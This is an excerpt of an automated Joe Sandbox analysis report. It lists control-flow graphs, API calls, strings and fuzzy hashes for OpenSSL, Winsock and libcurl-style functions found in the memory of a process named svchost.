7ffda3388e1c-7ffda3388e25 1069->1075 1071->1047 1078 7ffda3388f85-7ffda3388f88 1072->1078 1079 7ffda3388fb8-7ffda3388fbb 1072->1079 1073->1064 1074->1057 1081 7ffda3388e0d-7ffda3388e17 ERR_new 1074->1081 1082 7ffda3388e30-7ffda3388e3b 1075->1082 1085 7ffda3389028-7ffda338902f 1076->1085 1086 7ffda3389069-7ffda3389074 1076->1086 1077->1064 1083 7ffda3388f8a-7ffda3388f8d 1078->1083 1084 7ffda3388fac-7ffda3388fb6 1078->1084 1080 7ffda3388fc2-7ffda3388fcb 1079->1080 1080->1056 1080->1072 1081->1064 1087 7ffda3388e3d-7ffda3388e41 1082->1087 1088 7ffda3388e6e-7ffda3388e90 ERR_new ERR_set_debug 1082->1088 1090 7ffda3388f8f-7ffda3388f92 1083->1090 1091 7ffda3388fa0-7ffda3388faa 1083->1091 1084->1080 1085->1086 1089 7ffda3389031-7ffda338904a EVP_CIPHER_is_a 1085->1089 1086->1063 1087->1082 1092 7ffda3388e43-7ffda3388e54 OSSL_PARAM_get_int 1087->1092 1088->1071 1089->1086 1094 7ffda338904c-7ffda338905d EVP_CIPHER_is_a 1089->1094 1090->1080 1093 7ffda3388f94-7ffda3388f9e 1090->1093 1091->1080 1092->1057 1095 7ffda3388e5f-7ffda3388e69 ERR_new 1092->1095 1093->1080 1094->1086 1096 7ffda338905f 1094->1096 1095->1064 1096->1086
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: M_get_intO_zallocR_newR_set_debugR_set_error
                          • String ID: NULL$RC4$max_early_data$max_frag_len$ssl\record\methods\tls_common.c$stream_mac$tls_int_new_record_layer$tlstree$use_etm
                          • API String ID: 991255803-716357724
                          • Opcode ID: 15da27ef39abc0995a8b80d88fa4a5feae3ec9346f4c252a0678d098395b0108
                          • Instruction ID: 0e69ec6a4a137f0771e60dfed986d44ca495e76fabf528d94c9a7ca399108b9c
                          • Opcode Fuzzy Hash: 15da27ef39abc0995a8b80d88fa4a5feae3ec9346f4c252a0678d098395b0108
                          • Instruction Fuzzy Hash: D6B1A172B0EF8282EB50BB65D9602B96393EF44B84F004431DE4D6B79BDF6EE4458319
                          Function 00007FFDA333DAA0 Relevance: 56.4, APIs: 29, Strings: 3, Instructions: 384COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1097 7ffda333daa0-7ffda333dad4 call 7ffda33aedf0 CRYPTO_zalloc 1100 7ffda333dade-7ffda333db01 CRYPTO_THREAD_lock_new 1097->1100 1101 7ffda333dad6-7ffda333dadd 1097->1101 1102 7ffda333db2d-7ffda333db42 CRYPTO_free 1100->1102 1103 7ffda333db03-7ffda333db1a CRYPTO_new_ex_data 1100->1103 1106 7ffda333db45-7ffda333db76 ERR_new ERR_set_debug ERR_set_error 1102->1106 1104 7ffda333db20-7ffda333db29 CRYPTO_THREAD_lock_free 1103->1104 1105 7ffda333dbe1-7ffda333dc25 call 7ffda337fe80 1103->1105 1104->1102 1115 7ffda333dc3f-7ffda333dc9e OPENSSL_sk_dup 1105->1115 1116 7ffda333dc27-7ffda333dc39 1105->1116 1107 7ffda333dbc8 1106->1107 1108 7ffda333db78-7ffda333db82 1106->1108 1111 7ffda333dbca-7ffda333dbe0 1107->1111 1108->1107 1110 7ffda333db84-7ffda333db99 CRYPTO_free_ex_data 1108->1110 1113 7ffda333dba1-7ffda333dbc3 call 7ffda3333a70 CRYPTO_THREAD_lock_free CRYPTO_free 1110->1113 1114 7ffda333db9b 1110->1114 1113->1107 1114->1113 1117 7ffda333dca0-7ffda333dcce ERR_new ERR_set_debug ERR_set_error 1115->1117 1118 7ffda333dcd3-7ffda333dce9 call 7ffda332cb70 1115->1118 1116->1115 1117->1108 1118->1106 1123 7ffda333dcef-7ffda333dd6d 1118->1123 1123->1108 1124 7ffda333dd73-7ffda333ddba X509_VERIFY_PARAM_new 1123->1124 1125 7ffda333ddef-7ffda333de07 X509_VERIFY_PARAM_inherit call 7ffda336aa30 1124->1125 1126 7ffda333ddbc-7ffda333ddea ERR_new ERR_set_debug ERR_set_error 1124->1126 1129 7ffda333de1c 1125->1129 1130 7ffda333de09-7ffda333de12 call 7ffda336aa40 1125->1130 1126->1108 1131 7ffda333de1e-7ffda333de2a call 7ffda336aa30 1129->1131 1130->1129 1136 7ffda333de14-7ffda333de1a 1130->1136 1137 7ffda333de44-7ffda333ded6 1131->1137 1138 7ffda333de2c-7ffda333de35 call 7ffda336aa40 1131->1138 1136->1131 1140 7ffda333ded8-7ffda333defb CRYPTO_memdup 1137->1140 1141 7ffda333df17-7ffda333df21 1137->1141 1138->1137 1149 7ffda333de37-7ffda333de3e 1138->1149 1143 7ffda333defd-7ffda333df04 1140->1143 1144 7ffda333df09-7ffda333df10 1140->1144 1145 7ffda333df23-7ffda333df49 CRYPTO_memdup 1141->1145 1146 7ffda333df65-7ffda333df73 1141->1146 1143->1108 1144->1141 1150 7ffda333df57-7ffda333df5e 1145->1150 1151 7ffda333df4b-7ffda333df52 1145->1151 1147 7ffda333df75-7ffda333df98 CRYPTO_malloc 1146->1147 1148 7ffda333dfca-7ffda333e003 call 7ffda336aa30 1146->1148 1152 7ffda333dfa6-7ffda333dfc3 memcpy 1147->1152 1153 7ffda333df9a-7ffda333dfa1 1147->1153 1156 7ffda333e005-7ffda333e00e call 7ffda336aa40 1148->1156 1157 7ffda333e02c-7ffda333e034 1148->1157 1149->1137 1150->1146 1151->1108 1152->1148 1153->1108 1156->1157 1161 7ffda333e010-7ffda333e025 1156->1161 1157->1106 1162 7ffda333e03a-7ffda333e050 call 7ffda333e220 1157->1162 1161->1157 1163 7ffda333e053-7ffda333e055 1162->1163 1163->1106 1164 7ffda333e05b-7ffda333e0c0 1163->1164 1165 7ffda333e0c2-7ffda333e0e5 CRYPTO_memdup 1164->1165 1166 7ffda333e0f9-7ffda333e103 1164->1166 1165->1106 1167 7ffda333e0eb-7ffda333e0f2 1165->1167 1168 7ffda333e105-7ffda333e128 CRYPTO_memdup 1166->1168 1169 7ffda333e13c-7ffda333e14e 1166->1169 1167->1166 1168->1106 1170 7ffda333e12e-7ffda333e135 1168->1170 1171 7ffda333e150-7ffda333e153 1169->1171 1172 7ffda333e155-7ffda333e158 1169->1172 1170->1169 1174 7ffda333e16b-7ffda333e16e 1171->1174 1172->1106 1173 7ffda333e15e-7ffda333e165 1172->1173 1173->1106 1173->1174 1175 7ffda333e170-7ffda333e180 call 7ffda3391e60 1174->1175 1176 7ffda333e1e9-7ffda333e20c 1174->1176 1179 7ffda333e182-7ffda333e1b0 ERR_new ERR_set_debug ERR_set_error 1175->1179 1180 7ffda333e1b5-7ffda333e1b9 1175->1180 1176->1111 1179->1106 1181 7ffda333e1bb-7ffda333e1be 1180->1181 1182 7ffda333e1c9-7ffda333e1e3 1180->1182 1181->1182 1183 7ffda333e1c0-7ffda333e1c3 1181->1183 1182->1106 1182->1176 1183->1106 1183->1182
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: D_lock_freeO_free$D_lock_newO_free_ex_dataO_new_ex_dataO_zallocR_newR_set_debugR_set_error
                          • String ID: SSL_set_ct_validation_callback$ossl_ssl_connection_new_int$ssl\ssl_lib.c
                          • API String ID: 3044204582-3251968464
                          • Opcode ID: b4fd45c842d3ddb22811912ea25257d44cc47ab26ce588713fff448be1502e61
                          • Instruction ID: 8520cd1bd9f3b24d5ab2318c774a5e2bb94e549a310e73935003d3fa6fcc37f3
                          • Opcode Fuzzy Hash: b4fd45c842d3ddb22811912ea25257d44cc47ab26ce588713fff448be1502e61
                          • Instruction Fuzzy Hash: 29122A36B0AF8286EB98EF25D5A02A873A5FB48B44F044135DF5D57366DF3AE460C314
                          Function 00007FFDA55BB470 Relevance: 49.2, APIs: 19, Strings: 9, Instructions: 177libraryloadernetworkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1276 7ffda55bb470-7ffda55bb48c 1277 7ffda55bb4d6-7ffda55bb4dd call 7ffda5582e70 1276->1277 1278 7ffda55bb48e-7ffda55bb4a0 WSAStartup 1276->1278 1287 7ffda55bb76c-7ffda55bb783 call 7ffda55d5780 1277->1287 1288 7ffda55bb4e3-7ffda55bb510 GetModuleHandleW 1277->1288 1279 7ffda55bb4b9-7ffda55bb4d5 call 7ffda55d5780 1278->1279 1280 7ffda55bb4a2-7ffda55bb4a9 1278->1280 1282 7ffda55bb4ab-7ffda55bb4b1 1280->1282 1283 7ffda55bb4b3 WSACleanup 1280->1283 1282->1277 1282->1283 1283->1279 1290 7ffda55bb51e-7ffda55bb553 GetProcAddress wcspbrk 1288->1290 1291 7ffda55bb512-7ffda55bb519 1288->1291 1292 7ffda55bb555-7ffda55bb55b 1290->1292 1293 7ffda55bb57d-7ffda55bb580 1290->1293 1295 7ffda55bb69e-7ffda55bb6c1 GetModuleHandleA 1291->1295 1296 7ffda55bb56f-7ffda55bb578 LoadLibraryW 1292->1296 1297 7ffda55bb55d-7ffda55bb56a 1292->1297 1298 7ffda55bb5ac-7ffda55bb5c3 GetSystemDirectoryW 1293->1298 1299 7ffda55bb582-7ffda55bb595 GetProcAddress 1293->1299 1300 7ffda55bb708-7ffda55bb76a call 7ffda55c7db0 * 2 QueryPerformanceFrequency 1295->1300 1301 7ffda55bb6c3-7ffda55bb701 GetProcAddress * 3 1295->1301 1302 7ffda55bb66e-7ffda55bb680 1296->1302 1297->1302 1304 7ffda55bb666 1298->1304 1305 7ffda55bb5c9-7ffda55bb5e0 malloc 1298->1305 1299->1298 1303 7ffda55bb597-7ffda55bb5a7 LoadLibraryW 1299->1303 1300->1287 1301->1300 1302->1295 1309 7ffda55bb682-7ffda55bb695 GetProcAddress 1302->1309 1303->1302 1304->1302 1310 7ffda55bb65d-7ffda55bb660 free 1305->1310 1311 7ffda55bb5e2-7ffda55bb5f0 GetSystemDirectoryW 1305->1311 1309->1295 1313 7ffda55bb697 1309->1313 1310->1304 1311->1310 1314 7ffda55bb5f2-7ffda55bb5fc 1311->1314 1313->1295 1316 7ffda55bb600-7ffda55bb609 1314->1316 1316->1316 1317 7ffda55bb60b 1316->1317 1318 7ffda55bb612-7ffda55bb619 1317->1318 1318->1318 1319 7ffda55bb61b-7ffda55bb628 1318->1319 1320 7ffda55bb630-7ffda55bb63e 1319->1320 1320->1320 1321 7ffda55bb640-7ffda55bb646 1320->1321 1322 7ffda55bb648-7ffda55bb652 1321->1322 1323 7ffda55bb654 LoadLibraryW 1321->1323 1324 7ffda55bb65a 1322->1324 1323->1324 1324->1310
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad$DirectoryHandleModuleSystem$CleanupFrequencyPerformanceQueryStartupfreemallocwcspbrk
                          • String ID: AddDllDirectory$FreeAddrInfoExW$GetAddrInfoExCancel$GetAddrInfoExW$LoadLibraryExW$if_nametoindex$iphlpapi.dll$kernel32$ws2_32
                          • API String ID: 1741924799-1796637598
                          • Opcode ID: 2697f331b37d98f652b4482058136af72a4de187b0d93a3241bab0ceee7d76f6
                          • Instruction ID: aa7bdd69633c080d9c2e313185acca7e189bcd9d8ec180a0bd63f56cf5815f7c
                          • Opcode Fuzzy Hash: 2697f331b37d98f652b4482058136af72a4de187b0d93a3241bab0ceee7d76f6
                          • Instruction Fuzzy Hash: 5181632AB1B68AC2EF62DF11E4243B92391BF4AF90F494134C94E03796EF7CE5158708
                          Function 00007FFDA5572B20 Relevance: 46.8, APIs: 31, Instructions: 251synchronizationCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1326 7ffda5572b20-7ffda5572b78 calloc 1327 7ffda5572b7e-7ffda5572c06 memset malloc 1326->1327 1328 7ffda5572cd5-7ffda5572cde _errno 1326->1328 1330 7ffda5572c4d-7ffda5572c58 1327->1330 1331 7ffda5572c08-7ffda5572c31 InitializeCriticalSectionEx call 7ffda55b6b40 1327->1331 1329 7ffda5572ce0-7ffda5572d0a call 7ffda55d5780 1328->1329 1332 7ffda5572c6b-7ffda5572c72 1330->1332 1333 7ffda5572c5a-7ffda5572c60 closesocket 1330->1333 1340 7ffda5572d0b-7ffda5572d25 _strdup 1331->1340 1341 7ffda5572c37-7ffda5572c42 1331->1341 1337 7ffda5572c84-7ffda5572c9b free 1332->1337 1338 7ffda5572c74-7ffda5572c7e DeleteCriticalSection free 1332->1338 1333->1332 1342 7ffda5572ca2-7ffda5572cad 1337->1342 1343 7ffda5572c9d call 7ffda557fc60 1337->1343 1338->1337 1340->1330 1344 7ffda5572d2b-7ffda5572d4b free _strdup 1340->1344 1341->1330 1346 7ffda5572caf closesocket 1342->1346 1347 7ffda5572cb5-7ffda5572ccf memset free 1342->1347 1343->1342 1348 7ffda5572d51-7ffda5572d5f 1344->1348 1349 7ffda5572e3b-7ffda5572e45 1344->1349 1346->1347 1347->1328 1350 7ffda5572d65-7ffda5572d6c 1348->1350 1351 7ffda5572f06-7ffda5572f1c call 7ffda5582f10 1348->1351 1352 7ffda5572fa4-7ffda5572fbf free 1349->1352 1353 7ffda5572e4b-7ffda5572e88 EnterCriticalSection LeaveCriticalSection 1349->1353 1350->1351 1355 7ffda5572d72-7ffda5572d79 1350->1355 1364 7ffda5572eff-7ffda5572f01 1351->1364 1365 7ffda5572f1e-7ffda5572f31 _errno 1351->1365 1352->1328 1356 7ffda5572f41-7ffda5572f44 1353->1356 1357 7ffda5572e8e-7ffda5572e91 1353->1357 1355->1351 1359 7ffda5572d7f-7ffda5572d86 1355->1359 1360 7ffda5572f67-7ffda5572f70 1356->1360 1361 7ffda5572f46-7ffda5572f61 GetAddrInfoExCancel WaitForSingleObject CloseHandle 1356->1361 1362 7ffda5572e97-7ffda5572ea0 CloseHandle 1357->1362 1363 7ffda5572f36-7ffda5572f3f CloseHandle 1357->1363 1359->1351 1366 7ffda5572d8c-7ffda5572db8 MultiByteToWideChar 1359->1366 1368 7ffda5572f72 call 7ffda5582f60 1360->1368 1369 7ffda5572f77-7ffda5572f87 call 7ffda5572980 free 1360->1369 1361->1360 1367 7ffda5572f8d-7ffda5572fa1 call 7ffda55a4360 closesocket 1362->1367 1363->1367 1364->1329 1365->1349 1366->1351 1371 7ffda5572dbe-7ffda5572de9 MultiByteToWideChar 1366->1371 1367->1352 1368->1369 1369->1367 1371->1351 1375 7ffda5572def-7ffda5572e2f swprintf_s CreateEventW 1371->1375 1377 7ffda5572e31 1375->1377 1378 7ffda5572ea5-7ffda5572ef1 GetAddrInfoExW 1375->1378 1377->1349 1378->1364 1379 7ffda5572ef3-7ffda5572efa call 7ffda5572fd0 1378->1379 1379->1364
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$CriticalSection$CloseHandleclosesocket$AddrByteCharInfoMultiWide_errno_strdupmemset$CancelCreateDeleteEnterEventInitializeLeaveObjectSingleWaitcallocmallocsocketswprintf_s
                          • String ID:
                          • API String ID: 416132278-0
                          • Opcode ID: b754e2acbba8f62ce28666c0b1cd78244c23c721d766d0c8adfa948de88007ba
                          • Instruction ID: c0eced328a4a409a8789950e4bdffcfe0ac41b069c319936504a66e477b96b05
                          • Opcode Fuzzy Hash: b754e2acbba8f62ce28666c0b1cd78244c23c721d766d0c8adfa948de88007ba
                          • Instruction Fuzzy Hash: 22C1AF3A70AB8A82E756DF21E86436973A0FF46F54F444635EA6E03B92DF3CE0548314
                          Function 00007FFDA55C2780 Relevance: 46.1, APIs: 14, Strings: 12, Instructions: 565COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1381 7ffda55c2780-7ffda55c27ef call 7ffda55a45e0 call 7ffda55a4600 1386 7ffda55c27fb-7ffda55c2809 call 7ffda55c2360 1381->1386 1387 7ffda55c27f1-7ffda55c27f6 1381->1387 1392 7ffda55c2815-7ffda55c2828 call 7ffda55c4530 1386->1392 1393 7ffda55c280b-7ffda55c2810 1386->1393 1388 7ffda55c3010 1387->1388 1391 7ffda55c3012-7ffda55c3039 call 7ffda55d5780 1388->1391 1392->1388 1398 7ffda55c282e-7ffda55c2838 1392->1398 1393->1388 1399 7ffda55c284c-7ffda55c2856 1398->1399 1400 7ffda55c283a-7ffda55c284a _strdup 1398->1400 1401 7ffda55c2858-7ffda55c2868 _strdup 1399->1401 1402 7ffda55c286a-7ffda55c2874 1399->1402 1400->1393 1400->1399 1401->1393 1401->1402 1403 7ffda55c2876-7ffda55c2886 _strdup 1402->1403 1404 7ffda55c2895-7ffda55c28a4 call 7ffda55c3180 1402->1404 1403->1393 1405 7ffda55c2888-7ffda55c288f 1403->1405 1404->1388 1408 7ffda55c28aa-7ffda55c28b8 1404->1408 1405->1404 1409 7ffda55c28ca-7ffda55c28d4 1408->1409 1410 7ffda55c28ba-7ffda55c28c1 1408->1410 1412 7ffda55c28d6-7ffda55c28dd 1409->1412 1413 7ffda55c291f-7ffda55c292e call 7ffda55c3820 1409->1413 1410->1409 1411 7ffda55c28c3 1410->1411 1411->1409 1412->1413 1414 7ffda55c28df-7ffda55c2919 call 7ffda55a1920 call 7ffda55c5ef0 1412->1414 1413->1388 1419 7ffda55c2934-7ffda55c2952 1413->1419 1414->1393 1414->1413 1421 7ffda55c295d-7ffda55c2964 1419->1421 1422 7ffda55c2954-7ffda55c295b 1419->1422 1423 7ffda55c2967-7ffda55c296e 1421->1423 1422->1421 1422->1423 1425 7ffda55c2986-7ffda55c298d 1423->1425 1426 7ffda55c2970-7ffda55c2980 _strdup 1423->1426 1427 7ffda55c298f-7ffda55c29ac _strdup 1425->1427 1428 7ffda55c29ae-7ffda55c29b0 1425->1428 1426->1393 1426->1425 1427->1428 1428->1388 1429 7ffda55c29b6-7ffda55c29cc call 7ffda55c3ce0 1428->1429 1429->1388 1432 7ffda55c29d2-7ffda55c29d9 1429->1432 1433 7ffda55c29db-7ffda55c29e9 call 7ffda559b920 1432->1433 1434 7ffda55c29ef-7ffda55c29f6 1432->1434 1433->1391 1433->1434 1436 7ffda55c29f8-7ffda55c2a06 call 7ffda559b920 1434->1436 1437 7ffda55c2a0c-7ffda55c2a13 1434->1437 1436->1391 1436->1437 1438 7ffda55c2a15-7ffda55c2a20 call 7ffda559b920 1437->1438 1439 7ffda55c2a4a-7ffda55c2a53 1437->1439 1438->1391 1452 7ffda55c2a26-7ffda55c2a2d 1438->1452 1444 7ffda55c2a55-7ffda55c2a61 1439->1444 1445 7ffda55c2a6c-7ffda55c2a73 1439->1445 1444->1445 1447 7ffda55c2a63-7ffda55c2a6a 1444->1447 1448 7ffda55c2a75-7ffda55c2a77 1445->1448 1449 7ffda55c2a79-7ffda55c2a80 1445->1449 1447->1445 1448->1449 1450 7ffda55c2a89-7ffda55c2a97 1448->1450 1449->1450 1451 7ffda55c2a82 1449->1451 1453 7ffda55c2a99-7ffda55c2aa6 1450->1453 1454 7ffda55c2ab3-7ffda55c2aba 1450->1454 1451->1450 1452->1439 1455 7ffda55c2a2f-7ffda55c2a41 call 7ffda55b9870 1452->1455 1453->1388 1463 7ffda55c2aac 1453->1463 1456 7ffda55c2ac8-7ffda55c2ad6 1454->1456 1457 7ffda55c2abc-7ffda55c2ac2 1454->1457 1455->1439 1464 7ffda55c2a43 1455->1464 1461 7ffda55c2adc-7ffda55c2b00 call 7ffda557b5f0 1456->1461 1462 7ffda55c2b70-7ffda55c2bb3 call 7ffda55d0650 1456->1462 1457->1456 1473 7ffda55c2b60-7ffda55c2b6b call 7ffda55c1a70 1461->1473 1474 7ffda55c2b02-7ffda55c2b19 call 7ffda55a3f60 call 7ffda5579bc0 1461->1474 1462->1388 1469 7ffda55c2bb9-7ffda55c2bd6 call 7ffda55bf210 1462->1469 1463->1454 1464->1439 1475 7ffda55c2bd8-7ffda55c2be6 call 7ffda55b32e0 1469->1475 1476 7ffda55c2beb-7ffda55c2c1b call 7ffda55bf2a0 1469->1476 1473->1388 1474->1388 1488 7ffda55c2b1f-7ffda55c2b2e call 7ffda55c4fd0 1474->1488 1475->1476 1486 7ffda55c2c2a-7ffda55c2c33 1476->1486 1487 7ffda55c2c1d-7ffda55c2c25 call 7ffda55b3320 1476->1487 1490 7ffda55c2cec-7ffda55c2cfb 1486->1490 1491 7ffda55c2c39-7ffda55c2c60 call 7ffda557a3c0 1486->1491 1487->1486 1503 7ffda55c2b30-7ffda55c2b3f 1488->1503 1504 7ffda55c2b44-7ffda55c2b5b call 7ffda55c03a0 1488->1504 1494 7ffda55c2d0a-7ffda55c2d11 1490->1494 1495 7ffda55c2cfd-7ffda55c2d04 1490->1495 1505 7ffda55c2caf-7ffda55c2cb6 1491->1505 1506 7ffda55c2c62-7ffda55c2c66 1491->1506 1496 7ffda55c2d17-7ffda55c2d38 call 7ffda55c0810 1494->1496 1497 7ffda55c2f4e-7ffda55c2f5f 1494->1497 1495->1494 1495->1497 1516 7ffda55c2f48 1496->1516 1517 7ffda55c2d3e-7ffda55c2d4b 1496->1517 1501 7ffda55c2f71-7ffda55c2f74 1497->1501 1502 7ffda55c2f61-7ffda55c2f68 1497->1502 1510 7ffda55c2f76-7ffda55c2f8b call 7ffda557a2b0 1501->1510 1511 7ffda55c2fed-7ffda55c300b call 7ffda5583190 call 7ffda55c25e0 1501->1511 1502->1501 1509 7ffda55c2f6a 1502->1509 1503->1388 1504->1473 1512 7ffda55c2cb8-7ffda55c2cc6 call 7ffda55b32e0 1505->1512 1513 7ffda55c2ccb-7ffda55c2cdd 1505->1513 1507 7ffda55c2c70-7ffda55c2cad call 7ffda557a530 call 7ffda55c1670 call 7ffda557a3c0 1506->1507 1507->1505 1509->1501 1532 7ffda55c303a-7ffda55c3042 1510->1532 1533 7ffda55c2f91-7ffda55c2f94 1510->1533 1511->1388 1512->1513 1513->1490 1522 7ffda55c2cdf-7ffda55c2ce7 call 7ffda55b3320 1513->1522 1516->1497 1524 7ffda55c2d9f-7ffda55c2dae 1517->1524 1525 7ffda55c2d4d-7ffda55c2d98 free * 2 1517->1525 1522->1490 1530 7ffda55c2e58-7ffda55c2ef6 free * 3 call 7ffda55c25e0 1524->1530 1531 7ffda55c2db4-7ffda55c2e51 free * 4 1524->1531 1525->1524 1549 7ffda55c2ef8-7ffda55c2eff 1530->1549 1550 7ffda55c2f01-7ffda55c2f09 1530->1550 1531->1530 1535 7ffda55c3044-7ffda55c304c call 7ffda55b3320 1532->1535 1536 7ffda55c3051-7ffda55c3054 1532->1536 1533->1532 1539 7ffda55c2f9a-7ffda55c2f9e 1533->1539 1535->1536 1542 7ffda55c3056-7ffda55c3061 call 7ffda557a870 1536->1542 1543 7ffda55c3082-7ffda55c3091 call 7ffda55d04b0 1536->1543 1539->1532 1546 7ffda55c2fa4-7ffda55c2fba call 7ffda557a060 1539->1546 1542->1543 1559 7ffda55c3063-7ffda55c3071 call 7ffda557a130 1542->1559 1543->1388 1560 7ffda55c3097-7ffda55c30a5 call 7ffda55a3f60 call 7ffda5579bc0 1543->1560 1561 7ffda55c2fbc-7ffda55c2fc4 call 7ffda55b3320 1546->1561 1562 7ffda55c2fc9-7ffda55c2fcf 1546->1562 1554 7ffda55c2f18-7ffda55c2f43 call 7ffda5583190 1549->1554 1555 7ffda55c2f0b-7ffda55c2f12 1550->1555 1556 7ffda55c2f14 1550->1556 1571 7ffda55c310f-7ffda55c3126 call 7ffda55c1a70 call 7ffda55c4fd0 1554->1571 1555->1554 1556->1554 1577 7ffda55c3077-7ffda55c307d call 7ffda55c1670 1559->1577 1578 7ffda55c314b-7ffda55c3157 call 7ffda5583190 1559->1578 1580 7ffda55c30aa-7ffda55c30ae 1560->1580 1561->1562 1565 7ffda55c2fde-7ffda55c2fe8 call 7ffda5583190 1562->1565 1566 7ffda55c2fd1-7ffda55c2fdc call 7ffda55c1670 1562->1566 1565->1511 1566->1536 1571->1388 1590 7ffda55c312c-7ffda55c3137 1571->1590 1577->1543 1578->1511 1580->1388 1585 7ffda55c30b4-7ffda55c30bb 1580->1585 1588 7ffda55c30bd-7ffda55c30c3 1585->1588 1589 7ffda55c30e1-7ffda55c30e8 1585->1589 1588->1589 1591 7ffda55c30c5-7ffda55c30da call 7ffda5583190 1588->1591 1589->1571 1592 7ffda55c30ea-7ffda55c30f1 1589->1592 1593 7ffda55c315c-7ffda55c3162 call 7ffda55c4cc0 1590->1593 1594 7ffda55c3139-7ffda55c3146 call 7ffda55794c0 1590->1594 1591->1589 1592->1571 1596 7ffda55c30f3-7ffda55c3108 call 7ffda5583190 1592->1596 1602 7ffda55c3167-7ffda55c316b 1593->1602 1594->1388 1596->1571 1602->1388 1604 7ffda55c3171-7ffda55c317b call 7ffda55794c0 1602->1604 1604->1388
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID: ($($NTLM picked AND auth done set, clear picked$NTLM-proxy picked AND auth done set, clear picked$No connections available in cache$No connections available.$No more connections allowed to host: %zu$Re-using existing connection with %s %s$anonymous$ftp@example.com$host$proxy
                          • API String ID: 0-3942307397
                          • Opcode ID: 1733cf3c4f71a555df5f6a50032d9b8bb588882759e49a2dea7c43c5f06a7732
                          • Instruction ID: 7a9c9e3f20a27420523828eedfdedad418a2a04754a3aa8ba8995e96c5b17d0f
                          • Opcode Fuzzy Hash: 1733cf3c4f71a555df5f6a50032d9b8bb588882759e49a2dea7c43c5f06a7732
